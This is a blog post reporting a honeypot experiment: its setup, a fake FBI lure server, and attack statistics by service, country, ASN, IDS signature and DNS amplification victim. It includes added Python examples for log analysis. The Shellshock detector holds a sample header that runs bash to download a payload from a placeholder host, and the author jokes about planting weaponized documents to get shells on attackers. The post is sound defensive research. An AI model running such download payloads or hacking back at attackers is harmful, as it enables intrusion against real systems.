Funny Honey – tracking hackers in cyberspace, part 1

Like many people in the security community, I decided to run a bunch of honeypots and see what's out there on the scary Internet. You've probably heard it's all China, right?
So I set up a six-host honeypot network on Google Cloud and ran it for a few months to find out.

Tech stack

To gain really actionable intelligence you need quality honeypot software, preferably one that fully emulates a service and is properly instrumented. Unfortunately, I didn't have the resources to build such a thing myself (hell of a task). Open source honeypots also have a lot of drawbacks:

  • They're old. Most of them haven't been updated in years, like honeyd or dionaea.
  • They're easy to fingerprint. If you run them as is, it is unlikely you would get any interesting data, since they can be trivially fingerprinted.
  • They're low interaction. Most of them can't go beyond passively listening on the port.
  • They're a pain to deploy.

So I opted to run a mix of customized open source honeypots and custom-developed ones.
Here is my stack:

  • SSH – for SSH I was running cowrie, a medium interaction honeypot that emulates a live Linux system to some degree. I modified it so it would emulate an Ubuntu 14.04 server, and I also modified all the modules so that anyone trying to figure out whether they had hit a honeypot would fail until it was too late.
  • DNS – for DNS I was running a modified DNSChef, which emulates a fully functional DNS server but can be customized to give any dummy reply. I mostly used it to monitor DNS amplification DDoS attacks.
  • Web – for web I wrote a low interaction HTTP/HTTPS server that detects web attacks, downloads Shellshock payloads if there are any, and is capable of replying with a 200 code to any request. I was too lazy to have it serve a real web page, so it was mostly aimed at catching various scripts and scanners.
  • Mail – I was also running a fully featured open SMTP relay that saved any emails sent through it but didn't actually deliver anything anywhere. For that I was using smtp-sink from Postfix.
  • Telnet, SNMP, RDP, NTP, MSSQL, MySQL, VNC, FTP, TFTP, SIP – all of these were low interaction, running on opencanary, but were capable of emulating a banner and basic service routines, so on an nmap service scan they would look like the real thing and could still be somewhat useful.
  • IDS – I opted for Suricata with the ET Open ruleset.

I was running every service on all the machines, so they looked a bit weird with so many open ports and two SSH daemons, but it was a trade-off, since I also wanted to know whether all my honeypots were hit by the same attack or not. However, it is not recommended to run all those services on a single machine, as it looks really suspicious, especially mixing Linux and Windows ones; then again, it could also be some kind of NAT firewall with port forwarding, so you never know…
Here is how one of my honeypots looks on Shodan:

[image: honey1]

Shodan also didn't think it was a honeypot according to their Honeypot Or Not check:

[image: honey2]

Point is, you are unlikely to get real threat intelligence beyond automated attacks and amateur script kiddies with this setup, but it can still be a fun project to work on, and useful, as you never know who will come knocking.

The story

To have a little bit of fun I also designed one honeypot to look like an FBI system, with banners, users, various other artifacts and “classified” files, all designed to support the narrative that it was some kind of classified FBI system holding intelligence information. All of this was put together with a little bit of OSINT, creative imagination and some data from pastebin, so don't come knocking on my door 🙂
Here are some of the files:

[image: honey3]

[image: honey4]

And here is the MOTD message that greets the attacker:

[image: honey5]

I was just curious how real attackers poking around the server would react. Pseudo-sensitive data, or even better, documents with honeytokens, can be an effective way to lure and track attackers.
Or you know, just put some weaponized documents there and have fun popping shells on attackers 🙂

Attack stats

Let's see what insights we can get from all this data.
Of course not every connection is an attack per se, but we still count every connection as an attack in our stats. This also includes things like Shodan and other research scans, but there is no easy way to exclude them all.
The first question is how fast a new system gets attacked.
There is a common notion that the Internet is constantly under attack and new systems will be attacked almost immediately after popping online.
I set up all my honeypots at different times over a few weeks. Some of them sat idle for a few days or even a week, but some were attacked as fast as 20 minutes after the initial setup.
So it looks like the notion is still true.
The next question is which services were targeted the most.

[image: honey6]

Everybody knows that exposing DB servers on the Internet is a really bad idea, but then why isn't MySQL that heavily targeted? And I thought RDP, web and SSH, along with telnet, would be targeted more. Surprising stats to me.

The next question is which country is responsible for most attacks.

[image: honey7]

Here are the top 10 attacker countries. Looks like it is China after all.
However, attacks really do come from all over the world; there were attacks from 147 countries. So this doesn't give us much insight, other than maybe to geo-block China and other countries you do not do any business with, if you want to reduce the noise.

Let's see which ASNs contributed most to attacks.

[image: honey8]

Here are the top 10 ASNs, reflecting the stats by country.
Once again this doesn't provide much insight, as attacks originated from 1839 ASNs, most of them consumer ISPs.
The only curious thing here is the Alibaba network, but I was unable to find additional information about what kind of ASN this is, whether they are an ISP or not, and whether they have any relation to Alibaba Group.
Let's try to dig deeper into this ASN data and find something interesting. Digging into ASN data, if you have a decent Internet presence or traffic coming your way, can be insightful: you could find your clients among the attack sources and notify them, or just notice common ISPs that are tolerant of botnets (ahem, Hetzner and OVH) and the like, so you could maybe filter or scrutinize their traffic more. Note that some of this data could be incorrect due to the nature of IP-to-ASN mapping via a public database.

  • AS2152 California State University, Office of the Chancellor
    Just a single HTTP connection attempt from this ASN, nothing interesting.
  • AS197467 Samara State Aerospace University (SGAU)
    Automated attacks on the telnet service. Looks like they have an infected system.
  • AS6769 State Enterprise Infostruktura
    This one is particularly interesting; here is a snippet from their website:
    State Enterprise „Infostruktura” is administrator of the Secure State Data Communication Network (SSDCN), that is isolated from the Internet and provides the secure national-wide communication services for public institutions in Lithuania, also provides communications via SSDCN and TESTA with the National Networks of EU Member States, EU Institutions and EU Agencies. TESTA is the European Community’s own private network, also isolated from the Internet and allows officials from different Ministries and administrations to communicate at a trans-European level in a safe and prompt way.
    What? An isolated network hitting my honeypot?
    A few automated attacks on the telnet service from them. Looks like they got an infected system as well. So much for a secure network. Of course it doesn't mean the isolated network is exposed, but who knows what you could dig up from their ASN.
  • AS16880 TREND MICRO INCORPORATED
    Generic HTTP connections, all with the user-agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0). Doesn't look like a regular scan, as there were very few connections. Hunting exploit kits maybe?
  • AS27471 Blue Coat Systems, Inc
    Got a few connections to SSH as well as a single HTTP connection. Doesn't look like a regular scan, as the volume is very low and it hit only a few of my honeypots. All SSH connections were made with the Java client SSH-2.0-JSCH-0.1.42.
    As for the HTTP request, it was for the URL faire-dess-%C3%A0-l’ucpa.html, which means something about makeup in French. Probably something that was hosted on my honeypot IP before.
  • AS7160 Oracle Corporation
    Got SSH bruteforce from them (with oracle:oracle, ironically) as well as some RDP bruteforce. Abuse of Oracle cloud, it seems, or compromised servers.
  • AS32934 Facebook, Inc.
    Just generic HTTP connections with the user-agent facebookexternalhit/1.1. Most likely some links that were hosted on my IP before.
  • AS29484 Ruhr-Universitaet Bochum
    Amplification DDoS Tracker Project
  • AS197068 HLL LLC
    Russian Anti-DDoS vendor Qrator doing research scans.
  • AS73 University of Washington
    Some kind of research project about website accessibility.
  • AS62454 Zyztm Research Division 10 B.V.
    A few connections to FTP and POP3 ports; they are also on the Spamhaus blacklist. They claim to do some kind of research on their site, but it looks like it hasn't been updated in a while and some pages don't work. Shady network, but it doesn't look like they do Internet-wide scans, I got only a few connections from them.
  • AS32666 Case Western Reserve University
    Internet performance research project
  • AS25468 Rzeszow University of Technology
    An infected machine doing SSH bruteforce and downloading malware.
  • AS2510 FUJITSU LIMITED
    A few infected machines doing SSH and telnet bruteforcing.
  • AS23028 Team Cymru Inc.
    DNS research scans
  • AS20940 Akamai International B.V.
    Anti-DDoS vendor doing research scans
  • AS88 Princeton University
    Just a single HTTP connection, nothing interesting.
  • AS8308 NAUKOWA I AKADEMICKA SIEC KOMPUTEROWA INSTYTUT BADAWCZY
    Single machine doing limited RDP bruteforce.
  • AS8278 Technical University of Crete
    Single HTTP connection, nothing interesting.
  • AS7624 Jeonju University
    One infected machine doing automated telnet attacks.
  • AS7560 Chonbuk National University
    One infected machine doing automated telnet attacks.
  • AS56765 Shahid Beheshti University
    One host on the CINS blacklist that was scanning for RDP, nothing else.
  • AS5379 Univerzitet Sv. Kiril i Metodij
    Single connection to SSH with immediate disconnect. Got scared of FBI? 🙂
  • AS47610 RWTH Aachen University
    Some kind of research scan
  • AS38450 Ministry of Infomation Communication Technology
    This is a Thailand ministry, single host doing RDP bruteforcing. Also note a typo in Information word 🙂
  • AS3784 Pohang University of Science and Technology
    Single host doing RDP bruteforcing
  • AS3449 Universidad Nacional de Buenos Aires
    Single connection to SSH with immediate disconnect. Got scared of FBI? 🙂
  • AS3141 Benemerita Universidad Autonoma de Puebla
    One infected host doing automated telnet attacks
  • AS3058 Joint SuperComputer Center of the Russian Academy of Sciences
    One infected host doing automated telnet attacks
  • AS27 University of Maryland
    Got a couple of pings from a single machine, nothing interesting.
  • AS25 University of California at Berkeley
    Got a few HTTP requests to a ts.php page from a single machine. Wasn't able to find out what this is.
  • AS23974 Ministry of education
    Another Thailand ministry, single machine doing a limited VNC scan.
  • AS203959 BackConnect Security LLC
    One host doing telnet bruteforcing. This is not a security company; I wasn't able to find out what kind of network this is.
  • AS10198 Catholic University of Pusan
    Got a couple of DNS reply packets with the domain pgcki.1st.attackd9.m.cdn30.com. That also triggered the rule ET TROJAN DNS Reply for unallocated address space – Potentially Malicious 1.1.1.0/24.
    Not sure what this is, since I never sent DNS requests in the first place, but the main domain has been associated with malware in the past.

So we got a whole bunch of stuff: infected systems, security companies and universities doing research projects, and just random noise.
Now let's dig deeper into each service.
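The three questions asked above (time to first attack per host, top services and ASNs, and whether the same sources hit all the honeypots) reduce to a few aggregations over the connection log. This is an added example, not the author's tooling; the record layout, the sample connections and the deployment times are constructed for it.

```python
from collections import Counter, defaultdict, namedtuple
from datetime import datetime

# One row per inbound connection; every connection counts as an attack, as in the stats above.
Conn = namedtuple("Conn", "ts honeypot service src_ip country asn")

# Constructed sample log (RFC 5737 addresses, RFC 5398 documentation ASNs). The field
# layout is an assumption for this example, not the format of the honeypots' own logs.
CONNECTIONS = [
    Conn("2016-01-10T12:00:00", "hp1", "ssh",    "203.0.113.5",  "CN", "AS64496"),
    Conn("2016-01-10T12:03:00", "hp1", "telnet", "198.51.100.7", "US", "AS64497"),
    Conn("2016-01-10T12:05:00", "hp2", "rdp",    "203.0.113.5",  "CN", "AS64496"),
    Conn("2016-01-11T09:00:00", "hp2", "ssh",    "192.0.2.44",   "RU", "AS64498"),
    Conn("2016-01-12T08:00:00", "hp3", "ssh",    "203.0.113.5",  "CN", "AS64496"),
    Conn("2016-01-12T08:30:00", "hp3", "telnet", "198.51.100.7", "US", "AS64497"),
    Conn("2016-01-12T10:00:00", "hp1", "dns",    "192.0.2.44",   "RU", "AS64498"),
]
# When each honeypot went online (constructed).
DEPLOYED = {"hp1": "2016-01-10T11:40:00", "hp2": "2016-01-10T10:00:00", "hp3": "2016-01-09T08:00:00"}

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")

def minutes_to_first_attack(connections, deployed):
    """Minutes between each honeypot going online and its first inbound connection."""
    first = {}
    for c in connections:
        t = parse_ts(c.ts)
        if c.honeypot not in first or t < first[c.honeypot]:
            first[c.honeypot] = t
    return {hp: (t - parse_ts(deployed[hp])).total_seconds() / 60 for hp, t in first.items()}

def top_n(connections, field, n=10):
    """Top-N values of one field (service, country, asn, ...) by connection count."""
    return Counter(getattr(c, field) for c in connections).most_common(n)

def sources_seen_on(connections, min_honeypots=2):
    """Source IPs that hit at least min_honeypots distinct honeypots: a crude way to tell
    one campaign sweeping the whole range from unrelated noise."""
    seen = defaultdict(set)
    for c in connections:
        seen[c.src_ip].add(c.honeypot)
    return {ip: sorted(hps) for ip, hps in seen.items() if len(hps) >= min_honeypots}

if __name__ == "__main__":
    print(minutes_to_first_attack(CONNECTIONS, DEPLOYED))
    print(top_n(CONNECTIONS, "service"), top_n(CONNECTIONS, "asn", 3))
    print(sources_seen_on(CONNECTIONS, 3))
```

The ASN column is only as good as the IP-to-ASN database it came from, so treat the ASN ranking as a lead to verify rather than a fact.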

IDS

The first question is which signatures were triggered.

[image: honey9]

Here is the top 10. Overall, 287 unique signatures were triggered.
The only anomaly here is the Python rule; it was triggered because Google's monitoring system was constantly hitting one of my servers for some reason, even though I hadn't bought any monitoring services.
Let's dig deeper into this dataset.

The next question is whether any exploits were used.

[image: honey10]

Here are all the signatures in the EXPLOIT category. Sorry Verizon, no FREAK here.
I was curious what Zollard is, as I didn't remember anything with that name. Turns out this is an old worm from 2013 targeting IoT devices, also known as Darlloz, that exploits an old php-cgi flaw and uploads malware.

Another one that caught my attention is IPMI. This is also a high profile vulnerability from 2013 that allows bypassing authentication on IPMI consoles such as Dell iDRAC or HP iLO.

What about web vulnerabilities?

[image: honey11]

Most of this is Shellshock, and most of the payloads that were still available to download were the Darlloz worm.
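The web honeypot described in the tech stack has to recognize a Shellshock attempt in any request header and record where the payload points before anything else. This is an added example of that detection step, not the author's server; the header samples and host names are constructed for it.

```python
import re

# A Shellshock payload is a bash function definition followed by a command, delivered in any
# HTTP header the CGI layer exports as an environment variable (User-Agent, Cookie, Referer...).
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{\s*:\s*;\s*\}\s*;")
URL_RE = re.compile(r"https?://[^\s'\";|&<>]+")

# Constructed request headers for the example (placeholder hosts from RFC 2606 / RFC 5737);
# these are not captured traffic from the honeypot.
REQUESTS = [
    {"Host": "203.0.113.1",
     "User-Agent": "() { :;}; /bin/bash -c \"wget http://payload.example.net/x -O /tmp/x\""},
    {"Host": "203.0.113.1",
     "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
     "Cookie": "() { :; }; /bin/ping -c 1 example.org"},
    {"Host": "203.0.113.1", "User-Agent": "curl/7.47.0"},
]

def detect_shellshock(headers):
    """Return (header_name, [urls]) for every header that carries the Shellshock pattern.
    The URLs are what a honeypot would queue for later retrieval and offline analysis."""
    hits = []
    for name, value in headers.items():
        if SHELLSHOCK_RE.search(value):
            hits.append((name, URL_RE.findall(value)))
    return hits

def scan_requests(requests):
    """Index of every request with at least one Shellshock header, with its findings."""
    results = []
    for i, headers in enumerate(requests):
        hits = detect_shellshock(headers)
        if hits:
            results.append((i, hits))
    return results

if __name__ == "__main__":
    for idx, hits in scan_requests(REQUESTS):
        print(idx, hits)
```

Checking every header rather than only User-Agent matters: the second constructed request carries the pattern in Cookie and no URL at all, which is how callback-style probes look.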

Let's see where the exploitation attempts come from.

[image: honey12]

[image: honey13]

Here is the top 10 by ASN. Overall, attacks came from 71 ASNs. The IANA one is incorrect, by the way; it is in fact some kind of VPS provider on another ASN. Nothing interesting about this data.
The next question is whether there is any malware related traffic.

[image: honey14]

The Morto signature generates lots of false positives on regular bruteforce attacks, so it's not necessarily the Morto worm from 2011.
The Micros one is interesting; it looks for the Micros POS terminal RDP server, possibly remnants of the BrutPOS botnet.

Let's see where this malware traffic comes from.

[image: honey29]

[image: honey28]

Here are the top 10 stats. Overall we got 83 countries and 379 ASNs. This is also heavily skewed by RDP bruteforce attacks, but I've included the data anyway.

Next question: what about scanners?

[image: honey15]

Nothing particularly interesting here.
Let's see where we get scanned from.

[image: honey16]

Here is the top 10. Overall we got scanned from 69 countries.

Now to the ASN data.

[image: honey17]

Here is the top 10. Overall we got scanned from 375 ASNs.
China does contribute the most to scanning in terms of unique hosts doing the scanning.

Next question: what about DoS attacks?

[image: honey18]

No surprises here. One detail though: since the nature of an amplification attack is to forge requests with the target's source IP, below we will be looking at victims rather than attackers.

Let's see where the victims are located.

[image: honey19]

Here is the top 10. Overall, we got 27 countries as victims.

And for ASNs we got:

[image: honey20]

Here is the top 10. Overall, we got 123 ASNs under DDoS attack, most of them hosting providers.

DNS

Let's dig into the DNS server data.
First question: which domains were requested, excluding ANY request types?

[image: honey21]

Here is the top 10. Overall we got 80 unique domain names.
There were very few requests for normal domains that are not associated with various DNS scanning services.
The Baidu ones are weird though, but most of those requests come from China as well.

Next question: which DNS request types were served?

[image: honey22]

No real surprises here, with ANY in a huge lead, as it is used to carry out DNS amplification DDoS attacks.

Next question: which countries and ASNs connected to our DNS server?

[image: honey24]

Here is the top 10. Overall we got connections from 18 countries.

As for ASNs:

[image: honey23]

Here is the top 10. Overall we got connections from 49 ASNs.
Next question: who were the victims of DDoS?

[image: honey25]

Here is the top 10. Overall we got 135 victims.
Of course not all of them are real victims, as various scanners also send the same request.
Most of the victims are servers without distinct DNS names, plus a few client machines hosted on consumer ISPs.
I don't see any DDoS attacks against well known or even just relevant websites through my servers, which is surprising. The most attacked server has an Apache test page.
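Pulling the victim list out of the DNS honeypot log is a matter of counting ANY queries per source address, since in an amplification attack that address is the spoofed victim, and then separating sustained floods from the single probes that DNS scanners send. This is an added example, not the author's analysis code; the query records, the three-field layout and the flood threshold are constructed assumptions.

```python
from collections import Counter, namedtuple

Query = namedtuple("Query", "src_ip qtype qname")

def burst(src, qtype, qname, n):
    return [Query(src, qtype, qname) for _ in range(n)]

# Constructed query log (RFC 5737 addresses, RFC 2606 domains); the layout is an
# assumption for this example, not the format DNSChef writes.
QUERIES = (
    burst("203.0.113.9", "ANY", "example.com.", 40)     # spoofed victim: sustained ANY flood
    + burst("203.0.113.77", "ANY", "example.net.", 25)  # second victim
    + burst("198.51.100.3", "ANY", "example.com.", 1)   # single probe: looks like a scanner
    + burst("198.51.100.3", "A", "example.com.", 1)
    + burst("192.0.2.50", "A", "example.org.", 3)       # ordinary lookups
    + burst("192.0.2.50", "TXT", "example.org.", 1)
)

def qtype_distribution(queries):
    """Request types served, most frequent first (ANY dominates on an open resolver)."""
    return Counter(q.qtype for q in queries).most_common()

def domains_excluding_any(queries, n=10):
    """Top-N requested names once the ANY amplification traffic is set aside."""
    return Counter(q.qname for q in queries if q.qtype != "ANY").most_common(n)

def amplification_victims(queries, min_any=5):
    """(src_ip, count) for sources whose ANY queries reach min_any, largest first.
    These are victims, not attackers: the source address is forged to point at them.
    The threshold is an assumed cut-off that drops one-off research probes."""
    counts = Counter(q.src_ip for q in queries if q.qtype == "ANY")
    return [(ip, c) for ip, c in counts.most_common() if c >= min_any]

def likely_scanners(queries, min_any=5):
    """Sources that sent ANY queries but stayed below the flood threshold."""
    counts = Counter(q.src_ip for q in queries if q.qtype == "ANY")
    return sorted(ip for ip, c in counts.items() if c < min_any)

if __name__ == "__main__":
    print(qtype_distribution(QUERIES))
    print(amplification_victims(QUERIES), likely_scanners(QUERIES))
```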
Next question: which countries and ASNs were attacked the most?

[image: honey26]

Here is the top 10. Overall we got 20 countries attacked.
And for ASNs:

[image: honey27]

All in all, nothing interesting in this data.

In part 2 we continue analyzing the data from the other services.


8 comments

  1. Friends have also seen a lot of sipvicious. Would be interesting to hear more analysis of it.

    For the SSH brutes, can you determine if certain lists (e.g., rockyou-75) or username sets were used? That analysis would be awesome to hear more about.

  2. If the lists for FTP, SSH, telnet, et al. correlate at all. Seen interesting attacks that do FTP or SSH bruting and then leverage restricted shells (i.e., ftponly) to enable SSH forwarding on the same host and then pivot through to an SMTP server in order to send unsolicited email. May be difficult to detect these actors if you don't send the mail though, at least for a day or two at first.

  3. […] *Source: dfir-blog, translated by FB editor 老王隔壁的白帽子; when reposting please credit FreeBuf黑客与极客 (FreeBuf.COM) […]

  4. […] *Source: dfir-blog, translated by FB editor 老王隔壁的白帽子 […]

  5. TrendMicro frequently scans for HTTP(s) ports. They are often the first ones to knock on port 80 if you set up a webserver.

    Also, scans coming from the University of Michigan may be related to the Censys project.
